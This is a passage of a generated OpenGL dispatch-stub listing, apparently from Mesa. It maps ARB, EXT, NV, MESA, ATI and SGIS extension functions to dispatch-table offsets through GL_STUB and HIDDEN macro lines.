GL_STUB(ProgramLocalParameter4fARB, _gloffset_ProgramLocalParameter4fARB, ProgramLocalParameter4fARB@24)
GL_STUB(ProgramLocalParameter4fvARB, _gloffset_ProgramLocalParameter4fvARB, ProgramLocalParameter4fvARB@12)
GL_STUB(ProgramStringARB, _gloffset_ProgramStringARB, ProgramStringARB@16)
GL_STUB(VertexAttrib1dARB, _gloffset_VertexAttrib1dARB, VertexAttrib1dARB@12)
GL_STUB(VertexAttrib1dvARB, _gloffset_VertexAttrib1dvARB, VertexAttrib1dvARB@8)
GL_STUB(VertexAttrib1fARB, _gloffset_VertexAttrib1fARB, VertexAttrib1fARB@8)
GL_STUB(VertexAttrib1fvARB, _gloffset_VertexAttrib1fvARB, VertexAttrib1fvARB@8)
GL_STUB(VertexAttrib1sARB, _gloffset_VertexAttrib1sARB, VertexAttrib1sARB@8)
GL_STUB(VertexAttrib1svARB, _gloffset_VertexAttrib1svARB, VertexAttrib1svARB@8)
GL_STUB(VertexAttrib2dARB, _gloffset_VertexAttrib2dARB, VertexAttrib2dARB@20)
GL_STUB(VertexAttrib2dvARB, _gloffset_VertexAttrib2dvARB, VertexAttrib2dvARB@8)
GL_STUB(VertexAttrib2fARB, _gloffset_VertexAttrib2fARB, VertexAttrib2fARB@12)
GL_STUB(VertexAttrib2fvARB, _gloffset_VertexAttrib2fvARB, VertexAttrib2fvARB@8)
GL_STUB(VertexAttrib2sARB, _gloffset_VertexAttrib2sARB, VertexAttrib2sARB@12)
GL_STUB(VertexAttrib2svARB, _gloffset_VertexAttrib2svARB, VertexAttrib2svARB@8)
GL_STUB(VertexAttrib3dARB, _gloffset_VertexAttrib3dARB, VertexAttrib3dARB@28)
GL_STUB(VertexAttrib3dvARB, _gloffset_VertexAttrib3dvARB, VertexAttrib3dvARB@8)
GL_STUB(VertexAttrib3fARB, _gloffset_VertexAttrib3fARB, VertexAttrib3fARB@16)
GL_STUB(VertexAttrib3fvARB, _gloffset_VertexAttrib3fvARB, VertexAttrib3fvARB@8)
GL_STUB(VertexAttrib3sARB, _gloffset_VertexAttrib3sARB, VertexAttrib3sARB@16)
GL_STUB(VertexAttrib3svARB, _gloffset_VertexAttrib3svARB, VertexAttrib3svARB@8)
GL_STUB(VertexAttrib4NbvARB, _gloffset_VertexAttrib4NbvARB, VertexAttrib4NbvARB@8)
GL_STUB(VertexAttrib4NivARB, _gloffset_VertexAttrib4NivARB, VertexAttrib4NivARB@8)
GL_STUB(VertexAttrib4NsvARB, _gloffset_VertexAttrib4NsvARB, VertexAttrib4NsvARB@8)
GL_STUB(VertexAttrib4NubARB, _gloffset_VertexAttrib4NubARB, VertexAttrib4NubARB@20)
GL_STUB(VertexAttrib4NubvARB, _gloffset_VertexAttrib4NubvARB, VertexAttrib4NubvARB@8)
GL_STUB(VertexAttrib4NuivARB, _gloffset_VertexAttrib4NuivARB, VertexAttrib4NuivARB@8)
GL_STUB(VertexAttrib4NusvARB, _gloffset_VertexAttrib4NusvARB, VertexAttrib4NusvARB@8)
GL_STUB(VertexAttrib4bvARB, _gloffset_VertexAttrib4bvARB, VertexAttrib4bvARB@8)
GL_STUB(VertexAttrib4dARB, _gloffset_VertexAttrib4dARB, VertexAttrib4dARB@36)
GL_STUB(VertexAttrib4dvARB, _gloffset_VertexAttrib4dvARB, VertexAttrib4dvARB@8)
GL_STUB(VertexAttrib4fARB, _gloffset_VertexAttrib4fARB, VertexAttrib4fARB@20)
GL_STUB(VertexAttrib4fvARB, _gloffset_VertexAttrib4fvARB, VertexAttrib4fvARB@8)
GL_STUB(VertexAttrib4ivARB, _gloffset_VertexAttrib4ivARB, VertexAttrib4ivARB@8)
GL_STUB(VertexAttrib4sARB, _gloffset_VertexAttrib4sARB, VertexAttrib4sARB@20)
GL_STUB(VertexAttrib4svARB, _gloffset_VertexAttrib4svARB, VertexAttrib4svARB@8)
GL_STUB(VertexAttrib4ubvARB, _gloffset_VertexAttrib4ubvARB, VertexAttrib4ubvARB@8)
GL_STUB(VertexAttrib4uivARB, _gloffset_VertexAttrib4uivARB, VertexAttrib4uivARB@8)
GL_STUB(VertexAttrib4usvARB, _gloffset_VertexAttrib4usvARB, VertexAttrib4usvARB@8)
GL_STUB(VertexAttribPointerARB, _gloffset_VertexAttribPointerARB, VertexAttribPointerARB@24)
GL_STUB(BindBufferARB, _gloffset_BindBufferARB, BindBufferARB@8)
GL_STUB(BufferDataARB, _gloffset_BufferDataARB, BufferDataARB@16)
GL_STUB(BufferSubDataARB, _gloffset_BufferSubDataARB, BufferSubDataARB@16)
GL_STUB(DeleteBuffersARB, _gloffset_DeleteBuffersARB, DeleteBuffersARB@8)
GL_STUB(GenBuffersARB, _gloffset_GenBuffersARB, GenBuffersARB@8)
GL_STUB(GetBufferParameterivARB, _gloffset_GetBufferParameterivARB, GetBufferParameterivARB@12)
GL_STUB(GetBufferPointervARB, _gloffset_GetBufferPointervARB, GetBufferPointervARB@12)
GL_STUB(GetBufferSubDataARB, _gloffset_GetBufferSubDataARB, GetBufferSubDataARB@16)
GL_STUB(IsBufferARB, _gloffset_IsBufferARB, IsBufferARB@4)
GL_STUB(MapBufferARB, _gloffset_MapBufferARB, MapBufferARB@8)
GL_STUB(UnmapBufferARB, _gloffset_UnmapBufferARB, UnmapBufferARB@4)
GL_STUB(BeginQueryARB, _gloffset_BeginQueryARB, BeginQueryARB@8)
GL_STUB(DeleteQueriesARB, _gloffset_DeleteQueriesARB, DeleteQueriesARB@8)
GL_STUB(EndQueryARB, _gloffset_EndQueryARB, EndQueryARB@4)
GL_STUB(GenQueriesARB, _gloffset_GenQueriesARB, GenQueriesARB@8)
GL_STUB(GetQueryObjectivARB, _gloffset_GetQueryObjectivARB, GetQueryObjectivARB@12)
GL_STUB(GetQueryObjectuivARB, _gloffset_GetQueryObjectuivARB, GetQueryObjectuivARB@12)
GL_STUB(GetQueryivARB, _gloffset_GetQueryivARB, GetQueryivARB@12)
GL_STUB(IsQueryARB, _gloffset_IsQueryARB, IsQueryARB@4)
GL_STUB(AttachObjectARB, _gloffset_AttachObjectARB, AttachObjectARB@8)
GL_STUB(CompileShaderARB, _gloffset_CompileShaderARB, CompileShaderARB@4)
GL_STUB(CreateProgramObjectARB, _gloffset_CreateProgramObjectARB, CreateProgramObjectARB@0)
GL_STUB(CreateShaderObjectARB, _gloffset_CreateShaderObjectARB, CreateShaderObjectARB@4)
GL_STUB(DeleteObjectARB, _gloffset_DeleteObjectARB, DeleteObjectARB@4)
GL_STUB(DetachObjectARB, _gloffset_DetachObjectARB, DetachObjectARB@8)
GL_STUB(GetActiveUniformARB, _gloffset_GetActiveUniformARB, GetActiveUniformARB@28)
GL_STUB(GetAttachedObjectsARB, _gloffset_GetAttachedObjectsARB, GetAttachedObjectsARB@16)
GL_STUB(GetHandleARB, _gloffset_GetHandleARB, GetHandleARB@4)
GL_STUB(GetInfoLogARB, _gloffset_GetInfoLogARB, GetInfoLogARB@16)
GL_STUB(GetObjectParameterfvARB, _gloffset_GetObjectParameterfvARB, GetObjectParameterfvARB@12)
GL_STUB(GetObjectParameterivARB, _gloffset_GetObjectParameterivARB, GetObjectParameterivARB@12)
GL_STUB(GetShaderSourceARB, _gloffset_GetShaderSourceARB, GetShaderSourceARB@16)
GL_STUB(GetUniformLocationARB, _gloffset_GetUniformLocationARB, GetUniformLocationARB@8)
GL_STUB(GetUniformfvARB, _gloffset_GetUniformfvARB, GetUniformfvARB@12)
GL_STUB(GetUniformivARB, _gloffset_GetUniformivARB, GetUniformivARB@12)
GL_STUB(LinkProgramARB, _gloffset_LinkProgramARB, LinkProgramARB@4)
GL_STUB(ShaderSourceARB, _gloffset_ShaderSourceARB, ShaderSourceARB@16)
GL_STUB(Uniform1fARB, _gloffset_Uniform1fARB, Uniform1fARB@8)
GL_STUB(Uniform1fvARB, _gloffset_Uniform1fvARB, Uniform1fvARB@12)
GL_STUB(Uniform1iARB, _gloffset_Uniform1iARB, Uniform1iARB@8)
GL_STUB(Uniform1ivARB, _gloffset_Uniform1ivARB, Uniform1ivARB@12)
GL_STUB(Uniform2fARB, _gloffset_Uniform2fARB, Uniform2fARB@12)
GL_STUB(Uniform2fvARB, _gloffset_Uniform2fvARB, Uniform2fvARB@12)
GL_STUB(Uniform2iARB, _gloffset_Uniform2iARB, Uniform2iARB@12)
GL_STUB(Uniform2ivARB, _gloffset_Uniform2ivARB, Uniform2ivARB@12)
GL_STUB(Uniform3fARB, _gloffset_Uniform3fARB, Uniform3fARB@16)
GL_STUB(Uniform3fvARB, _gloffset_Uniform3fvARB, Uniform3fvARB@12)
GL_STUB(Uniform3iARB, _gloffset_Uniform3iARB, Uniform3iARB@16)
GL_STUB(Uniform3ivARB, _gloffset_Uniform3ivARB, Uniform3ivARB@12)
GL_STUB(Uniform4fARB, _gloffset_Uniform4fARB, Uniform4fARB@20)
GL_STUB(Uniform4fvARB, _gloffset_Uniform4fvARB, Uniform4fvARB@12)
GL_STUB(Uniform4iARB, _gloffset_Uniform4iARB, Uniform4iARB@20)
GL_STUB(Uniform4ivARB, _gloffset_Uniform4ivARB, Uniform4ivARB@12)
GL_STUB(UniformMatrix2fvARB, _gloffset_UniformMatrix2fvARB, UniformMatrix2fvARB@16)
GL_STUB(UniformMatrix3fvARB, _gloffset_UniformMatrix3fvARB, UniformMatrix3fvARB@16)
GL_STUB(UniformMatrix4fvARB, _gloffset_UniformMatrix4fvARB, UniformMatrix4fvARB@16)
GL_STUB(UseProgramObjectARB, _gloffset_UseProgramObjectARB, UseProgramObjectARB@4)
GL_STUB(ValidateProgramARB, _gloffset_ValidateProgramARB, ValidateProgramARB@4)
GL_STUB(BindAttribLocationARB, _gloffset_BindAttribLocationARB, BindAttribLocationARB@12)
GL_STUB(GetActiveAttribARB, _gloffset_GetActiveAttribARB, GetActiveAttribARB@28)
GL_STUB(GetAttribLocationARB, _gloffset_GetAttribLocationARB, GetAttribLocationARB@8)
GL_STUB(DrawBuffersARB, _gloffset_DrawBuffersARB, DrawBuffersARB@8)
GL_STUB(PolygonOffsetEXT, _gloffset_PolygonOffsetEXT, PolygonOffsetEXT@8)
GL_STUB(_dispatch_stub_562, _gloffset_GetPixelTexGenParameterfvSGIS, _dispatch_stub_562@8)
HIDDEN(GL_PREFIX(_dispatch_stub_562, _dispatch_stub_562@8))
GL_STUB(_dispatch_stub_563, _gloffset_GetPixelTexGenParameterivSGIS, _dispatch_stub_563@8)
HIDDEN(GL_PREFIX(_dispatch_stub_563, _dispatch_stub_563@8))
GL_STUB(_dispatch_stub_564, _gloffset_PixelTexGenParameterfSGIS, _dispatch_stub_564@8)
HIDDEN(GL_PREFIX(_dispatch_stub_564, _dispatch_stub_564@8))
GL_STUB(_dispatch_stub_565, _gloffset_PixelTexGenParameterfvSGIS, _dispatch_stub_565@8)
HIDDEN(GL_PREFIX(_dispatch_stub_565, _dispatch_stub_565@8))
GL_STUB(_dispatch_stub_566, _gloffset_PixelTexGenParameteriSGIS, _dispatch_stub_566@8)
HIDDEN(GL_PREFIX(_dispatch_stub_566, _dispatch_stub_566@8))
GL_STUB(_dispatch_stub_567, _gloffset_PixelTexGenParameterivSGIS, _dispatch_stub_567@8)
HIDDEN(GL_PREFIX(_dispatch_stub_567, _dispatch_stub_567@8))
GL_STUB(_dispatch_stub_568, _gloffset_SampleMaskSGIS, _dispatch_stub_568@8)
HIDDEN(GL_PREFIX(_dispatch_stub_568, _dispatch_stub_568@8))
GL_STUB(_dispatch_stub_569, _gloffset_SamplePatternSGIS, _dispatch_stub_569@4)
HIDDEN(GL_PREFIX(_dispatch_stub_569, _dispatch_stub_569@4))
GL_STUB(ColorPointerEXT, _gloffset_ColorPointerEXT, ColorPointerEXT@20)
GL_STUB(EdgeFlagPointerEXT, _gloffset_EdgeFlagPointerEXT, EdgeFlagPointerEXT@12)
GL_STUB(IndexPointerEXT, _gloffset_IndexPointerEXT, IndexPointerEXT@16)
GL_STUB(NormalPointerEXT, _gloffset_NormalPointerEXT, NormalPointerEXT@16)
GL_STUB(TexCoordPointerEXT, _gloffset_TexCoordPointerEXT, TexCoordPointerEXT@20)
GL_STUB(VertexPointerEXT, _gloffset_VertexPointerEXT, VertexPointerEXT@20)
GL_STUB(PointParameterfEXT, _gloffset_PointParameterfEXT, PointParameterfEXT@8)
GL_STUB(PointParameterfvEXT, _gloffset_PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB(LockArraysEXT, _gloffset_LockArraysEXT, LockArraysEXT@8)
GL_STUB(UnlockArraysEXT, _gloffset_UnlockArraysEXT, UnlockArraysEXT@0)
GL_STUB(_dispatch_stub_580, _gloffset_CullParameterdvEXT, _dispatch_stub_580@8)
HIDDEN(GL_PREFIX(_dispatch_stub_580, _dispatch_stub_580@8))
GL_STUB(_dispatch_stub_581, _gloffset_CullParameterfvEXT, _dispatch_stub_581@8)
HIDDEN(GL_PREFIX(_dispatch_stub_581, _dispatch_stub_581@8))
GL_STUB(SecondaryColor3bEXT, _gloffset_SecondaryColor3bEXT, SecondaryColor3bEXT@12)
GL_STUB(SecondaryColor3bvEXT, _gloffset_SecondaryColor3bvEXT, SecondaryColor3bvEXT@4)
GL_STUB(SecondaryColor3dEXT, _gloffset_SecondaryColor3dEXT, SecondaryColor3dEXT@24)
GL_STUB(SecondaryColor3dvEXT, _gloffset_SecondaryColor3dvEXT, SecondaryColor3dvEXT@4)
GL_STUB(SecondaryColor3fEXT, _gloffset_SecondaryColor3fEXT, SecondaryColor3fEXT@12)
GL_STUB(SecondaryColor3fvEXT, _gloffset_SecondaryColor3fvEXT, SecondaryColor3fvEXT@4)
GL_STUB(SecondaryColor3iEXT, _gloffset_SecondaryColor3iEXT, SecondaryColor3iEXT@12)
GL_STUB(SecondaryColor3ivEXT, _gloffset_SecondaryColor3ivEXT, SecondaryColor3ivEXT@4)
GL_STUB(SecondaryColor3sEXT, _gloffset_SecondaryColor3sEXT, SecondaryColor3sEXT@12)
GL_STUB(SecondaryColor3svEXT, _gloffset_SecondaryColor3svEXT, SecondaryColor3svEXT@4)
GL_STUB(SecondaryColor3ubEXT, _gloffset_SecondaryColor3ubEXT, SecondaryColor3ubEXT@12)
GL_STUB(SecondaryColor3ubvEXT, _gloffset_SecondaryColor3ubvEXT, SecondaryColor3ubvEXT@4)
GL_STUB(SecondaryColor3uiEXT, _gloffset_SecondaryColor3uiEXT, SecondaryColor3uiEXT@12)
GL_STUB(SecondaryColor3uivEXT, _gloffset_SecondaryColor3uivEXT, SecondaryColor3uivEXT@4)
GL_STUB(SecondaryColor3usEXT, _gloffset_SecondaryColor3usEXT, SecondaryColor3usEXT@12)
GL_STUB(SecondaryColor3usvEXT, _gloffset_SecondaryColor3usvEXT, SecondaryColor3usvEXT@4)
GL_STUB(SecondaryColorPointerEXT, _gloffset_SecondaryColorPointerEXT, SecondaryColorPointerEXT@16)
GL_STUB(MultiDrawArraysEXT, _gloffset_MultiDrawArraysEXT, MultiDrawArraysEXT@16)
GL_STUB(MultiDrawElementsEXT, _gloffset_MultiDrawElementsEXT, MultiDrawElementsEXT@20)
GL_STUB(FogCoordPointerEXT, _gloffset_FogCoordPointerEXT, FogCoordPointerEXT@12)
GL_STUB(FogCoorddEXT, _gloffset_FogCoorddEXT, FogCoorddEXT@8)
GL_STUB(FogCoorddvEXT, _gloffset_FogCoorddvEXT, FogCoorddvEXT@4)
GL_STUB(FogCoordfEXT, _gloffset_FogCoordfEXT, FogCoordfEXT@4)
GL_STUB(FogCoordfvEXT, _gloffset_FogCoordfvEXT, FogCoordfvEXT@4)
GL_STUB(_dispatch_stub_606, _gloffset_PixelTexGenSGIX, _dispatch_stub_606@4)
HIDDEN(GL_PREFIX(_dispatch_stub_606, _dispatch_stub_606@4))
GL_STUB(BlendFuncSeparateEXT, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB(FlushVertexArrayRangeNV, _gloffset_FlushVertexArrayRangeNV, FlushVertexArrayRangeNV@0)
GL_STUB(VertexArrayRangeNV, _gloffset_VertexArrayRangeNV, VertexArrayRangeNV@8)
GL_STUB(CombinerInputNV, _gloffset_CombinerInputNV, CombinerInputNV@24)
GL_STUB(CombinerOutputNV, _gloffset_CombinerOutputNV, CombinerOutputNV@40)
GL_STUB(CombinerParameterfNV, _gloffset_CombinerParameterfNV, CombinerParameterfNV@8)
GL_STUB(CombinerParameterfvNV, _gloffset_CombinerParameterfvNV, CombinerParameterfvNV@8)
GL_STUB(CombinerParameteriNV, _gloffset_CombinerParameteriNV, CombinerParameteriNV@8)
GL_STUB(CombinerParameterivNV, _gloffset_CombinerParameterivNV, CombinerParameterivNV@8)
GL_STUB(FinalCombinerInputNV, _gloffset_FinalCombinerInputNV, FinalCombinerInputNV@16)
GL_STUB(GetCombinerInputParameterfvNV, _gloffset_GetCombinerInputParameterfvNV, GetCombinerInputParameterfvNV@20)
GL_STUB(GetCombinerInputParameterivNV, _gloffset_GetCombinerInputParameterivNV, GetCombinerInputParameterivNV@20)
GL_STUB(GetCombinerOutputParameterfvNV, _gloffset_GetCombinerOutputParameterfvNV, GetCombinerOutputParameterfvNV@16)
GL_STUB(GetCombinerOutputParameterivNV, _gloffset_GetCombinerOutputParameterivNV, GetCombinerOutputParameterivNV@16)
GL_STUB(GetFinalCombinerInputParameterfvNV, _gloffset_GetFinalCombinerInputParameterfvNV, GetFinalCombinerInputParameterfvNV@12)
GL_STUB(GetFinalCombinerInputParameterivNV, _gloffset_GetFinalCombinerInputParameterivNV, GetFinalCombinerInputParameterivNV@12)
GL_STUB(ResizeBuffersMESA, _gloffset_ResizeBuffersMESA, ResizeBuffersMESA@0)
GL_STUB(WindowPos2dMESA, _gloffset_WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB(WindowPos2dvMESA, _gloffset_WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB(WindowPos2fMESA, _gloffset_WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB(WindowPos2fvMESA, _gloffset_WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB(WindowPos2iMESA, _gloffset_WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB(WindowPos2ivMESA, _gloffset_WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB(WindowPos2sMESA, _gloffset_WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB(WindowPos2svMESA, _gloffset_WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB(WindowPos3dMESA, _gloffset_WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB(WindowPos3dvMESA, _gloffset_WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB(WindowPos3fMESA, _gloffset_WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB(WindowPos3fvMESA, _gloffset_WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB(WindowPos3iMESA, _gloffset_WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB(WindowPos3ivMESA, _gloffset_WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB(WindowPos3sMESA, _gloffset_WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB(WindowPos3svMESA, _gloffset_WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB(WindowPos4dMESA, _gloffset_WindowPos4dMESA, WindowPos4dMESA@32)
GL_STUB(WindowPos4dvMESA, _gloffset_WindowPos4dvMESA, WindowPos4dvMESA@4)
GL_STUB(WindowPos4fMESA, _gloffset_WindowPos4fMESA, WindowPos4fMESA@16)
GL_STUB(WindowPos4fvMESA, _gloffset_WindowPos4fvMESA, WindowPos4fvMESA@4)
GL_STUB(WindowPos4iMESA, _gloffset_WindowPos4iMESA, WindowPos4iMESA@16)
GL_STUB(WindowPos4ivMESA, _gloffset_WindowPos4ivMESA, WindowPos4ivMESA@4)
GL_STUB(WindowPos4sMESA, _gloffset_WindowPos4sMESA, WindowPos4sMESA@16)
GL_STUB(WindowPos4svMESA, _gloffset_WindowPos4svMESA, WindowPos4svMESA@4)
GL_STUB(_dispatch_stub_648, _gloffset_MultiModeDrawArraysIBM, _dispatch_stub_648@20)
HIDDEN(GL_PREFIX(_dispatch_stub_648, _dispatch_stub_648@20))
GL_STUB(_dispatch_stub_649, _gloffset_MultiModeDrawElementsIBM, _dispatch_stub_649@24)
HIDDEN(GL_PREFIX(_dispatch_stub_649, _dispatch_stub_649@24))
GL_STUB(_dispatch_stub_650, _gloffset_DeleteFencesNV, _dispatch_stub_650@8)
HIDDEN(GL_PREFIX(_dispatch_stub_650, _dispatch_stub_650@8))
GL_STUB(_dispatch_stub_651, _gloffset_FinishFenceNV, _dispatch_stub_651@4)
HIDDEN(GL_PREFIX(_dispatch_stub_651, _dispatch_stub_651@4))
GL_STUB(_dispatch_stub_652, _gloffset_GenFencesNV, _dispatch_stub_652@8)
HIDDEN(GL_PREFIX(_dispatch_stub_652, _dispatch_stub_652@8))
GL_STUB(_dispatch_stub_653, _gloffset_GetFenceivNV, _dispatch_stub_653@12)
HIDDEN(GL_PREFIX(_dispatch_stub_653, _dispatch_stub_653@12))
GL_STUB(_dispatch_stub_654, _gloffset_IsFenceNV, _dispatch_stub_654@4)
HIDDEN(GL_PREFIX(_dispatch_stub_654, _dispatch_stub_654@4))
GL_STUB(_dispatch_stub_655, _gloffset_SetFenceNV, _dispatch_stub_655@8)
HIDDEN(GL_PREFIX(_dispatch_stub_655, _dispatch_stub_655@8))
GL_STUB(_dispatch_stub_656, _gloffset_TestFenceNV, _dispatch_stub_656@4)
HIDDEN(GL_PREFIX(_dispatch_stub_656, _dispatch_stub_656@4))
GL_STUB(AreProgramsResidentNV, _gloffset_AreProgramsResidentNV, AreProgramsResidentNV@12)
GL_STUB(BindProgramNV, _gloffset_BindProgramNV, BindProgramNV@8)
GL_STUB(DeleteProgramsNV, _gloffset_DeleteProgramsNV, DeleteProgramsNV@8)
GL_STUB(ExecuteProgramNV, _gloffset_ExecuteProgramNV, ExecuteProgramNV@12)
GL_STUB(GenProgramsNV, _gloffset_GenProgramsNV, GenProgramsNV@8)
GL_STUB(GetProgramParameterdvNV, _gloffset_GetProgramParameterdvNV, GetProgramParameterdvNV@16)
GL_STUB(GetProgramParameterfvNV, _gloffset_GetProgramParameterfvNV, GetProgramParameterfvNV@16)
GL_STUB(GetProgramStringNV, _gloffset_GetProgramStringNV, GetProgramStringNV@12)
GL_STUB(GetProgramivNV, _gloffset_GetProgramivNV, GetProgramivNV@12)
GL_STUB(GetTrackMatrixivNV, _gloffset_GetTrackMatrixivNV, GetTrackMatrixivNV@16)
GL_STUB(GetVertexAttribPointervNV, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB(GetVertexAttribdvNV, _gloffset_GetVertexAttribdvNV, GetVertexAttribdvNV@12)
GL_STUB(GetVertexAttribfvNV, _gloffset_GetVertexAttribfvNV, GetVertexAttribfvNV@12)
GL_STUB(GetVertexAttribivNV, _gloffset_GetVertexAttribivNV, GetVertexAttribivNV@12)
GL_STUB(IsProgramNV, _gloffset_IsProgramNV, IsProgramNV@4)
GL_STUB(LoadProgramNV, _gloffset_LoadProgramNV, LoadProgramNV@16)
GL_STUB(ProgramParameters4dvNV, _gloffset_ProgramParameters4dvNV, ProgramParameters4dvNV@16)
GL_STUB(ProgramParameters4fvNV, _gloffset_ProgramParameters4fvNV, ProgramParameters4fvNV@16)
GL_STUB(RequestResidentProgramsNV, _gloffset_RequestResidentProgramsNV, RequestResidentProgramsNV@8)
GL_STUB(TrackMatrixNV, _gloffset_TrackMatrixNV, TrackMatrixNV@16)
GL_STUB(VertexAttrib1dNV, _gloffset_VertexAttrib1dNV, VertexAttrib1dNV@12)
GL_STUB(VertexAttrib1dvNV, _gloffset_VertexAttrib1dvNV, VertexAttrib1dvNV@8)
GL_STUB(VertexAttrib1fNV, _gloffset_VertexAttrib1fNV, VertexAttrib1fNV@8)
GL_STUB(VertexAttrib1fvNV, _gloffset_VertexAttrib1fvNV, VertexAttrib1fvNV@8)
GL_STUB(VertexAttrib1sNV, _gloffset_VertexAttrib1sNV, VertexAttrib1sNV@8)
GL_STUB(VertexAttrib1svNV, _gloffset_VertexAttrib1svNV, VertexAttrib1svNV@8)
GL_STUB(VertexAttrib2dNV, _gloffset_VertexAttrib2dNV, VertexAttrib2dNV@20)
GL_STUB(VertexAttrib2dvNV, _gloffset_VertexAttrib2dvNV, VertexAttrib2dvNV@8)
GL_STUB(VertexAttrib2fNV, _gloffset_VertexAttrib2fNV, VertexAttrib2fNV@12)
GL_STUB(VertexAttrib2fvNV, _gloffset_VertexAttrib2fvNV, VertexAttrib2fvNV@8)
GL_STUB(VertexAttrib2sNV, _gloffset_VertexAttrib2sNV, VertexAttrib2sNV@12)
GL_STUB(VertexAttrib2svNV, _gloffset_VertexAttrib2svNV, VertexAttrib2svNV@8)
GL_STUB(VertexAttrib3dNV, _gloffset_VertexAttrib3dNV, VertexAttrib3dNV@28)
GL_STUB(VertexAttrib3dvNV, _gloffset_VertexAttrib3dvNV, VertexAttrib3dvNV@8)
GL_STUB(VertexAttrib3fNV, _gloffset_VertexAttrib3fNV, VertexAttrib3fNV@16)
GL_STUB(VertexAttrib3fvNV, _gloffset_VertexAttrib3fvNV, VertexAttrib3fvNV@8)
GL_STUB(VertexAttrib3sNV, _gloffset_VertexAttrib3sNV, VertexAttrib3sNV@16)
GL_STUB(VertexAttrib3svNV, _gloffset_VertexAttrib3svNV, VertexAttrib3svNV@8)
GL_STUB(VertexAttrib4dNV, _gloffset_VertexAttrib4dNV, VertexAttrib4dNV@36)
GL_STUB(VertexAttrib4dvNV, _gloffset_VertexAttrib4dvNV, VertexAttrib4dvNV@8)
GL_STUB(VertexAttrib4fNV, _gloffset_VertexAttrib4fNV, VertexAttrib4fNV@20)
GL_STUB(VertexAttrib4fvNV, _gloffset_VertexAttrib4fvNV, VertexAttrib4fvNV@8)
GL_STUB(VertexAttrib4sNV, _gloffset_VertexAttrib4sNV, VertexAttrib4sNV@20)
GL_STUB(VertexAttrib4svNV, _gloffset_VertexAttrib4svNV, VertexAttrib4svNV@8)
GL_STUB(VertexAttrib4ubNV, _gloffset_VertexAttrib4ubNV, VertexAttrib4ubNV@20)
GL_STUB(VertexAttrib4ubvNV, _gloffset_VertexAttrib4ubvNV, VertexAttrib4ubvNV@8)
GL_STUB(VertexAttribPointerNV, _gloffset_VertexAttribPointerNV, VertexAttribPointerNV@20)
GL_STUB(VertexAttribs1dvNV, _gloffset_VertexAttribs1dvNV, VertexAttribs1dvNV@12)
GL_STUB(VertexAttribs1fvNV, _gloffset_VertexAttribs1fvNV, VertexAttribs1fvNV@12)
GL_STUB(VertexAttribs1svNV, _gloffset_VertexAttribs1svNV, VertexAttribs1svNV@12)
GL_STUB(VertexAttribs2dvNV, _gloffset_VertexAttribs2dvNV, VertexAttribs2dvNV@12)
GL_STUB(VertexAttribs2fvNV, _gloffset_VertexAttribs2fvNV, VertexAttribs2fvNV@12)
GL_STUB(VertexAttribs2svNV, _gloffset_VertexAttribs2svNV, VertexAttribs2svNV@12)
GL_STUB(VertexAttribs3dvNV, _gloffset_VertexAttribs3dvNV, VertexAttribs3dvNV@12)
GL_STUB(VertexAttribs3fvNV, _gloffset_VertexAttribs3fvNV, VertexAttribs3fvNV@12)
GL_STUB(VertexAttribs3svNV, _gloffset_VertexAttribs3svNV, VertexAttribs3svNV@12)
GL_STUB(VertexAttribs4dvNV, _gloffset_VertexAttribs4dvNV, VertexAttribs4dvNV@12)
GL_STUB(VertexAttribs4fvNV, _gloffset_VertexAttribs4fvNV, VertexAttribs4fvNV@12)
GL_STUB(VertexAttribs4svNV, _gloffset_VertexAttribs4svNV, VertexAttribs4svNV@12)
GL_STUB(VertexAttribs4ubvNV, _gloffset_VertexAttribs4ubvNV, VertexAttribs4ubvNV@12)
GL_STUB(AlphaFragmentOp1ATI, _gloffset_AlphaFragmentOp1ATI, AlphaFragmentOp1ATI@24)
GL_STUB(AlphaFragmentOp2ATI, _gloffset_AlphaFragmentOp2ATI, AlphaFragmentOp2ATI@36)
GL_STUB(AlphaFragmentOp3ATI, _gloffset_AlphaFragmentOp3ATI, AlphaFragmentOp3ATI@48)
GL_STUB(BeginFragmentShaderATI, _gloffset_BeginFragmentShaderATI, BeginFragmentShaderATI@0)
GL_STUB(BindFragmentShaderATI, _gloffset_BindFragmentShaderATI, BindFragmentShaderATI@4)
GL_STUB(ColorFragmentOp1ATI, _gloffset_ColorFragmentOp1ATI, ColorFragmentOp1ATI@28)
GL_STUB(ColorFragmentOp2ATI, _gloffset_ColorFragmentOp2ATI, ColorFragmentOp2ATI@40)
GL_STUB(ColorFragmentOp3ATI, _gloffset_ColorFragmentOp3ATI, ColorFragmentOp3ATI@52)
GL_STUB(DeleteFragmentShaderATI, _gloffset_DeleteFragmentShaderATI, DeleteFragmentShaderATI@4)
GL_STUB(EndFragmentShaderATI, _gloffset_EndFragmentShaderATI, EndFragmentShaderATI@0)
GL_STUB(GenFragmentShadersATI, _gloffset_GenFragmentShadersATI, GenFragmentShadersATI@4)
GL_STUB(PassTexCoordATI, _gloffset_PassTexCoordATI, PassTexCoordATI@12)
GL_STUB(SampleMapATI, _gloffset_SampleMapATI, SampleMapATI@12)
GL_STUB(SetFragmentShaderConstantATI, _gloffset_SetFragmentShaderConstantATI, SetFragmentShaderConstantATI@8)
GL_STUB(PointParameteriNV, _gloffset_PointParameteriNV, PointParameteriNV@8)
GL_STUB(PointParameterivNV, _gloffset_PointParameterivNV, PointParameterivNV@8)
GL_STUB(_dispatch_stub_733, _gloffset_ActiveStencilFaceEXT, _dispatch_stub_733@4)
HIDDEN(GL_PREFIX(_dispatch_stub_733, _dispatch_stub_733@4))
